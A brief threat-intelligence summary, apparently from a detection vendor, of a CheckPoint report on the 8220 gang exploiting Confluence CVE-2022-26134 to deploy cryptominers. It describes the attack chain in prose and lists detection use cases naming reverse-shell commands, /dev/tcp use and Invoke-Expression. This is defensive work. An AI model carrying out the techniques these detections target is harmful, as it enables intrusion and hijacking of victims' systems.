8220 Gang Exploits Atlassian Zero-Day for Cyptomining

Industry: N/A | Level: Tactical | Source: CheckPoint

CheckPoint has identified attackers exploiting Atlassian Confluence and Data Center’s recently patched vulnerability CVE-2022-26134 to install cryptominers targeting Linux and Windows endpoints. 8220 is the the cybercriminal gang associated with this attack. The exploitation of this vulnerability often occurs a few days after attackers have scanned for vulnerable targets. Once targets have been identified the corresponding malware is downloaded onto the victim’s platform based on its operating system. In the Windows attack chain, the attacker utilizes PowerShell commands and scripts to initiate the attack. Reconnaissance activity with wmi, identified the system's architecture to download the necessary payload. The download executables would run on hosts, creating persistence in the start-up folder and utilize system resources for cryptomining.

Anvilogic Scenarios:

• 8220 Gang - Cryptominer Attack Chain - Windows
• Unix File Download, Modified, Executed

Anvilogic Use Cases:

• NIX Reverse Shell Commands
• Suspicious Use of /dev/tcp
• Suspicious process Spawned by Java
• Invoke-Expression Command
• Executable File Written to Disk
• Executable Process from Suspicious Folder
• Execution from Startup Folder